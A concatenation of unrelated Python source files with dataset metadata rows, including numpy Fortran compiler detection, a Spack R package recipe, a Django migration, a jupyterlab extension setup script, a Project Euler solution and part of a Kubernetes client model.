                    c = new_fcompiler(plat=platform, compiler=new_compiler,
                                      c_compiler=c_compiler)
                    c.customize(dist)
                    v = c.get_version()
                    if v is not None:
                        compiler_type = new_compiler
            if requiref90 and c.compiler_f90 is None:
                raise ValueError('%s does not support compiling f90 codes, '
                                 'skipping.' % (c.__class__.__name__))
        except DistutilsModuleError:
            log.debug("_find_existing_fcompiler: compiler_type='%s' raised DistutilsModuleError", compiler_type)
        except CompilerNotFound:
            log.debug("_find_existing_fcompiler: compiler_type='%s' not found", compiler_type)
        if v is not None:
            return compiler_type
    return None
def available_fcompilers_for_platform(osname=None, platform=None):
    """Return the ordered list of compiler types configured for the given
    OS name and platform (defaulting to the current interpreter's)."""
    if osname is None:
        osname = os.name
    if platform is None:
        platform = sys.platform
    matches = []
    for pattern, compiler_types in _default_compilers:
        if re.match(pattern, platform) or re.match(pattern, osname):
            for ctype in compiler_types:
                if ctype not in matches:
                    matches.append(ctype)
    # Fall back to GNU Fortran when nothing matched.
    return matches if matches else ['gnu']
def get_default_fcompiler(osname=None, platform=None, requiref90=False,
                          c_compiler=None):
    """Return the default Fortran compiler type for the given platform,
    or None if no installed compiler can be found."""
    candidates = available_fcompilers_for_platform(osname, platform)
    log.info("get_default_fcompiler: matching types: '%s'", candidates)
    # Probe the candidates in preference order; first working one wins.
    return _find_existing_fcompiler(candidates,
                                    osname=osname,
                                    platform=platform,
                                    requiref90=requiref90,
                                    c_compiler=c_compiler)
# Cache of (plat, compiler) keys that previously failed to resolve, so
# new_fcompiler() does not recheck for a Fortran compiler every time.
failed_fcompilers = set()
def new_fcompiler(plat=None,
                  compiler=None,
                  verbose=0,
                  dry_run=0,
                  force=0,
                  requiref90=False,
                  c_compiler = None):
    """Instantiate an FCompiler subclass for the given platform/compiler
    combination, or return None when no suitable compiler is known."""
    global failed_fcompilers
    fcompiler_key = (plat, compiler)
    if fcompiler_key in failed_fcompilers:
        # This combination already failed once; don't probe again.
        return None
    load_all_fcompiler_classes()
    if plat is None:
        plat = os.name
    if compiler is None:
        compiler = get_default_fcompiler(plat, requiref90=requiref90,
                                         c_compiler=c_compiler)
    # Look the type up directly, then through the alias table.
    desc = fcompiler_class.get(compiler)
    if desc is None:
        desc = fcompiler_aliases.get(compiler)
    if desc is None:
        msg = "don't know how to compile Fortran code on platform '%s'" % plat
        if compiler is not None:
            msg = msg + " with '%s' compiler." % compiler
        msg = msg + " Supported compilers are: %s)" \
              % (','.join(fcompiler_class.keys()))
        log.warn(msg)
        failed_fcompilers.add(fcompiler_key)
        return None
    module_name, klass, long_description = desc
    fc = klass(verbose=verbose, dry_run=dry_run, force=force)
    fc.c_compiler = c_compiler
    return fc
def show_fcompilers(dist=None):
    """Print the Fortran compilers that are found, available-but-missing,
    and not applicable for this platform (``config_fc --help-fcompiler``).
    """
    if dist is None:
        # Build a minimal Distribution so compiler customization can read
        # the usual config files and command-line options.
        from distutils.dist import Distribution
        from numpy.distutils.command.config_compiler import config_fc
        dist = Distribution()
        dist.script_name = os.path.basename(sys.argv[0])
        dist.script_args = ['config_fc'] + sys.argv[1:]
        try:
            dist.script_args.remove('--help-fcompiler')
        except ValueError:
            pass
        dist.cmdclass['config_fc'] = config_fc
        dist.parse_config_files()
        dist.parse_command_line()
    compilers = []     # found and working on this platform
    compilers_na = []  # applicable to this platform but not installed
    compilers_ni = []  # not applicable to this platform
    if not fcompiler_class:
        load_all_fcompiler_classes()
    platform_compilers = available_fcompilers_for_platform()
    for compiler in platform_compilers:
        v = None
        # Silence probe chatter; failures here are expected and benign.
        log.set_verbosity(-2)
        try:
            c = new_fcompiler(compiler=compiler, verbose=dist.verbose)
            c.customize(dist)
            v = c.get_version()
        except (DistutilsModuleError, CompilerNotFound) as e:
            log.debug("show_fcompilers: %s not found" % (compiler,))
            log.debug(repr(e))
        if v is None:
            compilers_na.append(("fcompiler="+compiler, None,
                                 fcompiler_class[compiler][2]))
        else:
            c.dump_properties()
            compilers.append(("fcompiler="+compiler, None,
                              fcompiler_class[compiler][2] + ' (%s)' % v))
    # Everything registered but not applicable to this platform.
    compilers_ni = list(set(fcompiler_class.keys()) - set(platform_compilers))
    compilers_ni = [("fcompiler="+fc, None, fcompiler_class[fc][2])
                    for fc in compilers_ni]
    compilers.sort()
    compilers_na.sort()
    compilers_ni.sort()
    pretty_printer = FancyGetopt(compilers)
    pretty_printer.print_help("Fortran compilers found:")
    pretty_printer = FancyGetopt(compilers_na)
    pretty_printer.print_help("Compilers available for this "
                              "platform, but not found:")
    if compilers_ni:
        pretty_printer = FancyGetopt(compilers_ni)
        pretty_printer.print_help("Compilers not available on this platform:")
    print("For compiler details, run 'config_fc --verbose' setup command.")
def dummy_fortran_file():
    """Create a temporary Fortran source defining an empty subroutine and
    return its filename without the ``.f`` suffix."""
    fobj, name = make_temp_file(suffix='.f')
    fobj.write("      subroutine dummy()\n      end\n")
    fobj.close()
    # Callers append their own extension, so strip the '.f'.
    return name[:-2]
# True for filenames with a classic fixed-form Fortran extension.
is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z', re.I).match
# Emacs-style mode headers that force a particular Fortran dialect.
_has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-', re.I).search
_has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-', re.I).search
_has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-', re.I).search
# Matches a line start that can only occur in free-format Fortran source.
_free_f90_start = re.compile(r'[^c*!]\s*[^\s\d\t]', re.I).match
def is_free_format(file):
    """Return 1 if *file* looks like free-format Fortran source, else 0.

    f90 allows both fixed and free format; we assume fixed format unless
    signs of free format are detected in the first non-comment lines, or
    an Emacs ``-*- f90 -*-`` header forces the decision.
    """
    result = 0
    # Use a context manager so the file is closed even if a regex or
    # decoding error is raised mid-scan (the original leaked the handle).
    with open_latin1(file, 'r') as f:
        line = f.readline()
        n = 10000  # maximum number of non-comment lines to inspect
        if _has_f_header(line):
            n = 0  # header forces fixed format; skip the scan
        elif _has_f90_header(line):
            n = 0  # header forces free format
            result = 1
        while n > 0 and line:
            line = line.rstrip()
            if line and line[0] != '!':
                n -= 1
                # A statement starting before column 6, or a trailing '&'
                # continuation, can only be free-format source.
                if (line[0] != '\t' and _free_f90_start(line[:5])) or line[-1:] == '&':
                    result = 1
                    break
            line = f.readline()
    return result
def has_f90_header(src):
    """Return a truthy value if *src* begins with an Emacs mode line
    forcing f90 or fixed-form interpretation."""
    # Context manager ensures the handle is closed even if readline raises
    # (the original closed it manually and could leak on error).
    with open_latin1(src, 'r') as f:
        line = f.readline()
    return _has_f90_header(line) or _has_fix_header(line)
# Matches directives like "cf77flags(<compiler_type>) = <flags>" embedded in
# the first lines of a Fortran source file.
_f77flags_re = re.compile(r'(c|)f77flags\s*\(\s*(?P<fcname>\w+)\s*\)\s*=\s*(?P<fflags>.*)', re.I)
def get_f77flags(src):
    """Scan the first 20 lines of *src* for ``f77flags(...) = ...``
    directives.

    Returns a dict mapping compiler type names to lists of flag strings.
    """
    flags = {}
    # Context manager closes the file even if split_quoted or the regex
    # raises mid-loop (the original leaked the handle in that case).
    with open_latin1(src, 'r') as f:
        for lineno, line in enumerate(f):
            if lineno >= 20:
                break  # directives are only honoured near the top
            m = _f77flags_re.match(line)
            if not m:
                continue
            fcname = m.group('fcname').strip()
            fflags = m.group('fflags').strip()
            flags[fcname] = split_quoted(fflags)
    return flags
if __name__ == '__main__':
    # Running this module directly lists the Fortran compilers detected on
    # the current system.
    show_fcompilers()
| true | true |
1c306952397df50dbb1817d16a605050bc049f1c | 1,306 | py | Python | var/spack/repos/builtin/packages/r-selectr/package.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2 | 2020-09-10T22:50:08.000Z | 2021-01-12T22:18:54.000Z | var/spack/repos/builtin/packages/r-selectr/package.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 14 | 2021-07-20T01:04:53.000Z | 2022-03-02T01:08:36.000Z | var/spack/repos/builtin/packages/r-selectr/package.py | jonglezb/spack | ebc871abbf8f082000617e1798c75260652f0770 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2021-05-06T00:17:46.000Z | 2021-05-06T00:17:46.000Z | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RSelectr(RPackage):
"""Translates a CSS3 selector into an equivalent XPath expression. This
allows us to use CSS selectors when working with the XML package as it
can only evaluate XPath expressions. Also provided are convenience
functions useful for using CSS selectors on XML nodes. This package
is a port of the Python package 'cssselect'
(<https://pythonhosted.org/cssselect/>)."""
homepage = "https://sjp.co.nz/projects/selectr"
url = "https://cloud.r-project.org/src/contrib/selectr_0.3-1.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/selectr"
version('0.4-1', sha256='8bd42f167629344e485e586f9b05fed342746132489079084d82133d7b3ee2ca')
version('0.4-0', sha256='40cd51bfe499954b300742c49f92167a68964b974268a7f47ca8864f32020ece')
version('0.3-1', sha256='db4f7ceea4b522a54c3ae7709787b0b7fcf389c5d945c5a278e3625388218949')
depends_on('r@3.0:', type=('build', 'run'))
depends_on('r-stringr', type=('build', 'run'))
depends_on('r-r6', when='@0.4-0:', type=('build', 'run'))
| 46.642857 | 95 | 0.724349 |
from spack import *
class RSelectr(RPackage):
homepage = "https://sjp.co.nz/projects/selectr"
url = "https://cloud.r-project.org/src/contrib/selectr_0.3-1.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/selectr"
version('0.4-1', sha256='8bd42f167629344e485e586f9b05fed342746132489079084d82133d7b3ee2ca')
version('0.4-0', sha256='40cd51bfe499954b300742c49f92167a68964b974268a7f47ca8864f32020ece')
version('0.3-1', sha256='db4f7ceea4b522a54c3ae7709787b0b7fcf389c5d945c5a278e3625388218949')
depends_on('r@3.0:', type=('build', 'run'))
depends_on('r-stringr', type=('build', 'run'))
depends_on('r-r6', when='@0.4-0:', type=('build', 'run'))
| true | true |
1c3069de3b057d647ee4bea6dc8db9a995c582b5 | 2,872 | py | Python | hypha/apply/projects/migrations/0025_add_report_models.py | hawkinsw/hypha | a9c46f6e1e1af5d32aef9499a06a065ea3d23d61 | [
"BSD-3-Clause"
] | 20 | 2021-04-08T16:38:49.000Z | 2022-02-09T20:05:57.000Z | hypha/apply/projects/migrations/0025_add_report_models.py | OpenTechFund/WebApp | d6e2bb21a39d1fa7566cb60fe19f372dabfa5f0f | [
"BSD-3-Clause"
] | 1,098 | 2017-12-15T11:23:03.000Z | 2020-01-24T07:58:07.000Z | hypha/apply/projects/migrations/0025_add_report_models.py | OpenTechFund/WebApp | d6e2bb21a39d1fa7566cb60fe19f372dabfa5f0f | [
"BSD-3-Clause"
] | 17 | 2020-02-07T14:55:54.000Z | 2021-04-04T19:32:38.000Z | # Generated by Django 2.1.11 on 2019-10-28 14:15
import django.core.files.storage
from django.db import migrations, models
import django.db.models.deletion
import hypha.apply.projects.models
class Migration(migrations.Migration):
dependencies = [
('application_projects', '0024_allow_no_comments_on_pr'),
]
operations = [
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('public', models.BooleanField(default=True)),
('end_date', models.DateField()),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reports', to='application_projects.Project')),
],
options={
'ordering': ('-end_date',),
},
),
migrations.CreateModel(
name='ReportConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('schedule_start', models.DateField(null=True)),
('occurrence', models.PositiveSmallIntegerField(default=1)),
('frequency', models.CharField(choices=[('week', 'Weeks'), ('month', 'Months')], default='month', max_length=5)),
('project', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='report_config', to='application_projects.Project')),
],
),
migrations.CreateModel(
name='ReportPrivateFiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('document', models.FileField(storage=django.core.files.storage.FileSystemStorage(), upload_to=hypha.apply.projects.models.report.report_path)),
],
),
migrations.CreateModel(
name='ReportVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('submitted', models.DateTimeField()),
('content', models.TextField()),
('report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='versions', to='application_projects.Report')),
],
),
migrations.AddField(
model_name='contract',
name='approved_at',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='reportprivatefiles',
name='report',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='application_projects.ReportVersion'),
),
]
| 44.184615 | 160 | 0.602368 |
import django.core.files.storage
from django.db import migrations, models
import django.db.models.deletion
import hypha.apply.projects.models
class Migration(migrations.Migration):
dependencies = [
('application_projects', '0024_allow_no_comments_on_pr'),
]
operations = [
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('public', models.BooleanField(default=True)),
('end_date', models.DateField()),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reports', to='application_projects.Project')),
],
options={
'ordering': ('-end_date',),
},
),
migrations.CreateModel(
name='ReportConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('schedule_start', models.DateField(null=True)),
('occurrence', models.PositiveSmallIntegerField(default=1)),
('frequency', models.CharField(choices=[('week', 'Weeks'), ('month', 'Months')], default='month', max_length=5)),
('project', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='report_config', to='application_projects.Project')),
],
),
migrations.CreateModel(
name='ReportPrivateFiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('document', models.FileField(storage=django.core.files.storage.FileSystemStorage(), upload_to=hypha.apply.projects.models.report.report_path)),
],
),
migrations.CreateModel(
name='ReportVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('submitted', models.DateTimeField()),
('content', models.TextField()),
('report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='versions', to='application_projects.Report')),
],
),
migrations.AddField(
model_name='contract',
name='approved_at',
field=models.DateTimeField(null=True),
),
migrations.AddField(
model_name='reportprivatefiles',
name='report',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='application_projects.ReportVersion'),
),
]
| true | true |
1c306a25629329ceaeb90ff4a2b64a1d7896121e | 412 | py | Python | pyvista/_version.py | fgallardo-mpie/pyvista | a4f148d3d165648eb871ba45fa39f457377bd10e | [
"MIT"
] | null | null | null | pyvista/_version.py | fgallardo-mpie/pyvista | a4f148d3d165648eb871ba45fa39f457377bd10e | [
"MIT"
] | null | null | null | pyvista/_version.py | fgallardo-mpie/pyvista | a4f148d3d165648eb871ba45fa39f457377bd10e | [
"MIT"
] | null | null | null | """Version info for pyvista.
On the ``master`` branch, use 'dev0' to denote a development version.
For example:
version_info = 0, 27, 'dev0'
---
When generating pre-release wheels, use '0rcN', for example:
version_info = 0, 28, '0rc1'
Denotes the first release candidate.
"""
# major, minor, patch
version_info = 0, 30, 'dev0'
# Nice string for the version
__version__ = '.'.join(map(str, version_info))
| 18.727273 | 69 | 0.699029 |
version_info = 0, 30, 'dev0'
__version__ = '.'.join(map(str, version_info))
| true | true |
1c306bdf12f452cbe3c58a8a04259382429d80d3 | 2,551 | py | Python | setup.py | DerThorsten/jupyterlab-jitsi | 5c2c3a5ea0f15d861373b375633803762254227a | [
"BSD-3-Clause"
] | 3 | 2021-06-24T09:38:33.000Z | 2021-06-25T04:02:22.000Z | setup.py | DerThorsten/jupyterlab-jitsi | 5c2c3a5ea0f15d861373b375633803762254227a | [
"BSD-3-Clause"
] | 1 | 2021-06-30T15:30:20.000Z | 2021-06-30T15:30:20.000Z | setup.py | DerThorsten/jupyterlab-jitsi | 5c2c3a5ea0f15d861373b375633803762254227a | [
"BSD-3-Clause"
] | 1 | 2021-06-29T13:10:35.000Z | 2021-06-29T13:10:35.000Z | """
jupyterlab-jitsi setup
"""
import json
from pathlib import Path
import setuptools
HERE = Path(__file__).parent.resolve()
# The name of the project
name = "jupyterlab-jitsi"
lab_path = (HERE / name.replace("-", "_") / "labextension")
# Representative files that should exist after a successful build
ensured_targets = [
str(lab_path / "package.json"),
str(lab_path / "static/style.js")
]
labext_name = "jupyterlab-jitsi"
data_files_spec = [
("share/jupyter/labextensions/%s" % labext_name, str(lab_path), "**"),
("share/jupyter/labextensions/%s" % labext_name, str(HERE), "install.json"),("etc/jupyter/jupyter_server_config.d",
"jupyter-config/server-config", "jupyterlab-jitsi.json"),
# For backward compatibility with notebook server
("etc/jupyter/jupyter_notebook_config.d",
"jupyter-config/nb-config", "jupyterlab-jitsi.json"),
]
long_description = (HERE / "README.md").read_text()
# Get the package info from package.json
pkg_json = json.loads((HERE / "package.json").read_bytes())
setup_args = dict(
name=name,
version=pkg_json["version"],
url=pkg_json["homepage"],
author=pkg_json["author"]["name"],
author_email=pkg_json["author"]["email"],
description=pkg_json["description"],
license=pkg_json["license"],
long_description=long_description,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(),
install_requires=[
"jupyter_server>=1.6,<2"
],
zip_safe=False,
include_package_data=True,
python_requires=">=3.6",
platforms="Linux, Mac OS X, Windows",
keywords=["Jupyter", "JupyterLab", "JupyterLab3"],
classifiers=[
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Framework :: Jupyter",
],
)
try:
from jupyter_packaging import (
wrap_installers,
npm_builder,
get_data_files
)
post_develop = npm_builder(
build_cmd="install:extension", source_dir="src", build_dir=lab_path
)
setup_args['cmdclass'] = wrap_installers(post_develop=post_develop, ensured_targets=ensured_targets)
setup_args['data_files'] = get_data_files(data_files_spec)
except ImportError as e:
pass
if __name__ == "__main__":
setuptools.setup(**setup_args)
| 30.011765 | 119 | 0.675029 | import json
from pathlib import Path
import setuptools
HERE = Path(__file__).parent.resolve()
name = "jupyterlab-jitsi"
lab_path = (HERE / name.replace("-", "_") / "labextension")
ensured_targets = [
str(lab_path / "package.json"),
str(lab_path / "static/style.js")
]
labext_name = "jupyterlab-jitsi"
data_files_spec = [
("share/jupyter/labextensions/%s" % labext_name, str(lab_path), "**"),
("share/jupyter/labextensions/%s" % labext_name, str(HERE), "install.json"),("etc/jupyter/jupyter_server_config.d",
"jupyter-config/server-config", "jupyterlab-jitsi.json"),
("etc/jupyter/jupyter_notebook_config.d",
"jupyter-config/nb-config", "jupyterlab-jitsi.json"),
]
long_description = (HERE / "README.md").read_text()
pkg_json = json.loads((HERE / "package.json").read_bytes())
setup_args = dict(
name=name,
version=pkg_json["version"],
url=pkg_json["homepage"],
author=pkg_json["author"]["name"],
author_email=pkg_json["author"]["email"],
description=pkg_json["description"],
license=pkg_json["license"],
long_description=long_description,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(),
install_requires=[
"jupyter_server>=1.6,<2"
],
zip_safe=False,
include_package_data=True,
python_requires=">=3.6",
platforms="Linux, Mac OS X, Windows",
keywords=["Jupyter", "JupyterLab", "JupyterLab3"],
classifiers=[
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Framework :: Jupyter",
],
)
try:
from jupyter_packaging import (
wrap_installers,
npm_builder,
get_data_files
)
post_develop = npm_builder(
build_cmd="install:extension", source_dir="src", build_dir=lab_path
)
setup_args['cmdclass'] = wrap_installers(post_develop=post_develop, ensured_targets=ensured_targets)
setup_args['data_files'] = get_data_files(data_files_spec)
except ImportError as e:
pass
if __name__ == "__main__":
setuptools.setup(**setup_args)
| true | true |
1c306c1652cab9052276bab88d6c156545572736 | 729 | py | Python | pytpp/attributes/tree_root.py | Venafi/pytpp | 42af655b2403b8c9447c86962abd4aaa0201f646 | [
"MIT"
] | 4 | 2022-02-04T23:58:55.000Z | 2022-02-15T18:53:08.000Z | pytpp/attributes/tree_root.py | Venafi/pytpp | 42af655b2403b8c9447c86962abd4aaa0201f646 | [
"MIT"
] | null | null | null | pytpp/attributes/tree_root.py | Venafi/pytpp | 42af655b2403b8c9447c86962abd4aaa0201f646 | [
"MIT"
] | null | null | null | from pytpp.attributes._helper import IterableMeta, Attribute
from pytpp.attributes.top import TopAttributes
class TreeRootAttributes(TopAttributes, metaclass=IterableMeta):
__config_class__ = "Tree Root"
company_name = Attribute('Company Name', min_version='17.3')
migration_task = Attribute('Migration Task')
pendo_eula_version = Attribute('Pendo EULA Version', min_version='19.2')
pendo_optional_data_collection = Attribute('Pendo Optional Data Collection', min_version='19.2')
schema_version = Attribute('Schema Version')
usage_tracking = Attribute('Usage Tracking', min_version='19.2')
use_company_name_for_analytics = Attribute('Use Company Name for Analytics', min_version='17.3')
version = Attribute('Version')
| 48.6 | 97 | 0.798354 | from pytpp.attributes._helper import IterableMeta, Attribute
from pytpp.attributes.top import TopAttributes
class TreeRootAttributes(TopAttributes, metaclass=IterableMeta):
__config_class__ = "Tree Root"
company_name = Attribute('Company Name', min_version='17.3')
migration_task = Attribute('Migration Task')
pendo_eula_version = Attribute('Pendo EULA Version', min_version='19.2')
pendo_optional_data_collection = Attribute('Pendo Optional Data Collection', min_version='19.2')
schema_version = Attribute('Schema Version')
usage_tracking = Attribute('Usage Tracking', min_version='19.2')
use_company_name_for_analytics = Attribute('Use Company Name for Analytics', min_version='17.3')
version = Attribute('Version')
| true | true |
1c306dc858b94ac19e37ef57b49c3a122586b7a6 | 80 | py | Python | nes/bus/devices/apu/sq2_hi.py | Hexadorsimal/pynes | dbb3d40c1240fa27f70fa798bcec09188755eec2 | [
"MIT"
] | 1 | 2017-05-13T18:57:09.000Z | 2017-05-13T18:57:09.000Z | nes/bus/devices/apu/sq2_hi.py | Hexadorsimal/py6502 | dbb3d40c1240fa27f70fa798bcec09188755eec2 | [
"MIT"
] | 7 | 2020-10-24T17:16:56.000Z | 2020-11-01T14:10:23.000Z | nes/bus/devices/apu/sq2_hi.py | Hexadorsimal/pynes | dbb3d40c1240fa27f70fa798bcec09188755eec2 | [
"MIT"
] | null | null | null | from nes.processors.registers import Register
class Sq2Hi(Register):
pass
| 13.333333 | 45 | 0.775 | from nes.processors.registers import Register
class Sq2Hi(Register):
pass
| true | true |
1c306f94d3148cda89763d15d67cfa4057307226 | 47 | py | Python | tests/conftest.py | noirbizarre/umfactory | 263426f415ef71fe27b733846e9331066be49bca | [
"MIT"
] | 2 | 2020-04-02T12:54:13.000Z | 2021-08-25T03:24:11.000Z | tests/conftest.py | noirbizarre/umfactory | 263426f415ef71fe27b733846e9331066be49bca | [
"MIT"
] | 160 | 2018-01-13T15:53:46.000Z | 2022-03-25T11:30:43.000Z | tests/conftest.py | noirbizarre/umfactory | 263426f415ef71fe27b733846e9331066be49bca | [
"MIT"
] | null | null | null | DB_URI = 'mongodb://localhost:27017/umfactory'
| 23.5 | 46 | 0.765957 | DB_URI = 'mongodb://localhost:27017/umfactory'
| true | true |
1c30700c7052f1fc5ab3723e41616a4f3d52e6f6 | 4,212 | py | Python | problem11.py | rentes/Euler | e28b536a15f2e795f886a5df261d38bb0181be07 | [
"MIT"
] | 1 | 2019-05-29T23:54:24.000Z | 2019-05-29T23:54:24.000Z | problem11.py | rentes/Euler | e28b536a15f2e795f886a5df261d38bb0181be07 | [
"MIT"
] | null | null | null | problem11.py | rentes/Euler | e28b536a15f2e795f886a5df261d38bb0181be07 | [
"MIT"
] | null | null | null | """Project Euler - Problem 11 - http://projecteuler.net/problem=11"""
import sys
import time
# please install numpy module (python-numpy on Arch Linux)
import numpy as np
import tools.timeutils as timeutils
def fill_matrix():
"""
Return a numpy matrix from the data in problem11-data.txt
"""
array = []
with open('problem11-data.txt', 'r') as f:
for line in f:
array.append(line.strip())
# this is just a 2d array, not a matrix
matrix_array = np.loadtxt('problem11-data.txt', delimiter=' ')
# this is a matrix
np_matrix = np.bmat(matrix_array)
return np_matrix
def largest_product_horizontally(matrix):
"""
Computes the largest product horizontally (line by line) on a given matrix
"""
largest_product = 1
for line in range(0, matrix.shape[0]):
for column in range(0, matrix.shape[1]-3):
product = int(matrix[line, column] *
matrix[line, column+1] *
matrix[line, column+2] *
matrix[line, column+3])
if product > largest_product:
largest_product = product
return largest_product
def largest_product_vertically(matrix):
"""
Computes the largest product vertically (column by column)
on a given matrix
"""
# rotating the matrix
vertical_matrix = np.rot90(matrix)
return largest_product_horizontally(vertical_matrix)
def largest_product_diagonally(matrix):
"""
Computes the largest product diagonally (NW, NE, SE, SW)
on a given value [x, y]
"""
product_nw = 1
product_ne = 1
product_se = 1
product_sw = 1
largest_product = 1
for line in range(0, matrix.shape[0]):
for column in range(0, matrix.shape[1]):
try:
# NW
product_nw = int(matrix[line, column] *
matrix[line-1, column-1] *
matrix[line-2, column-2] *
matrix[line-3, column-3])
# NE
product_ne = int(matrix[line, column] *
matrix[line-1, column+1] *
matrix[line-2, column+2] *
matrix[line-3, column+3])
# SE
product_se = int(matrix[line, column] *
matrix[line+1, column+1] *
matrix[line+2, column+2] *
matrix[line+3, column+3])
# SW
product_sw = int(matrix[line, column] *
matrix[line+1, column-1] *
matrix[line+2, column-2] *
matrix[line+3, column-3])
except IndexError:
pass
max_product = max(product_nw, product_ne, product_se, product_sw)
if max_product > largest_product:
# update the largest value found
largest_product = max_product
# resetting products for the 4 diagonals
product_nw = 1
product_ne = 1
product_se = 1
product_sw = 1
return largest_product
def main():
"""Main entry point for the script"""
start = time.time()
# create a matrix from the problem data
matrix = fill_matrix()
# compute the largest value from the matrix on a horizontal traversal
value_horizontally = largest_product_horizontally(matrix)
print("horizontally: " + str(value_horizontally))
# compute the largest value from the matrix on a vertical traversal
value_vertically = largest_product_vertically(matrix)
print("vertically: " + str(value_vertically))
# compute the largest value from the matrix on a diagonal traversal
value_diagonally = largest_product_diagonally(matrix)
print("diagonally: " + str(value_diagonally))
print("largest product found is: " +
str(max(value_horizontally, value_vertically, value_diagonally)))
timeutils.elapsed_time(time.time() - start)
if __name__ == '__main__':
sys.exit(main())
| 35.694915 | 78 | 0.566002 | import sys
import time
import numpy as np
import tools.timeutils as timeutils
def fill_matrix():
array = []
with open('problem11-data.txt', 'r') as f:
for line in f:
array.append(line.strip())
matrix_array = np.loadtxt('problem11-data.txt', delimiter=' ')
np_matrix = np.bmat(matrix_array)
return np_matrix
def largest_product_horizontally(matrix):
largest_product = 1
for line in range(0, matrix.shape[0]):
for column in range(0, matrix.shape[1]-3):
product = int(matrix[line, column] *
matrix[line, column+1] *
matrix[line, column+2] *
matrix[line, column+3])
if product > largest_product:
largest_product = product
return largest_product
def largest_product_vertically(matrix):
vertical_matrix = np.rot90(matrix)
return largest_product_horizontally(vertical_matrix)
def largest_product_diagonally(matrix):
product_nw = 1
product_ne = 1
product_se = 1
product_sw = 1
largest_product = 1
for line in range(0, matrix.shape[0]):
for column in range(0, matrix.shape[1]):
try:
product_nw = int(matrix[line, column] *
matrix[line-1, column-1] *
matrix[line-2, column-2] *
matrix[line-3, column-3])
product_ne = int(matrix[line, column] *
matrix[line-1, column+1] *
matrix[line-2, column+2] *
matrix[line-3, column+3])
product_se = int(matrix[line, column] *
matrix[line+1, column+1] *
matrix[line+2, column+2] *
matrix[line+3, column+3])
product_sw = int(matrix[line, column] *
matrix[line+1, column-1] *
matrix[line+2, column-2] *
matrix[line+3, column-3])
except IndexError:
pass
max_product = max(product_nw, product_ne, product_se, product_sw)
if max_product > largest_product:
largest_product = max_product
product_nw = 1
product_ne = 1
product_se = 1
product_sw = 1
return largest_product
def main():
start = time.time()
matrix = fill_matrix()
value_horizontally = largest_product_horizontally(matrix)
print("horizontally: " + str(value_horizontally))
value_vertically = largest_product_vertically(matrix)
print("vertically: " + str(value_vertically))
value_diagonally = largest_product_diagonally(matrix)
print("diagonally: " + str(value_diagonally))
print("largest product found is: " +
str(max(value_horizontally, value_vertically, value_diagonally)))
timeutils.elapsed_time(time.time() - start)
if __name__ == '__main__':
sys.exit(main())
| true | true |
1c307052dc55b95490f16a2d9cd3b8f3a840fa5d | 10,065 | py | Python | kubernetes_asyncio/client/models/v1_status.py | weltonrodrigo/kubernetes_asyncio | b793f3e9ea43cbd0f4ff40ace1b0b677682f4042 | [
"Apache-2.0"
] | null | null | null | kubernetes_asyncio/client/models/v1_status.py | weltonrodrigo/kubernetes_asyncio | b793f3e9ea43cbd0f4ff40ace1b0b677682f4042 | [
"Apache-2.0"
] | 13 | 2021-04-12T02:03:48.000Z | 2022-03-28T02:08:46.000Z | kubernetes_asyncio/client/models/v1_status.py | weltonrodrigo/kubernetes_asyncio | b793f3e9ea43cbd0f4ff40ace1b0b677682f4042 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.16.14
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes_asyncio.client.configuration import Configuration
class V1Status(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
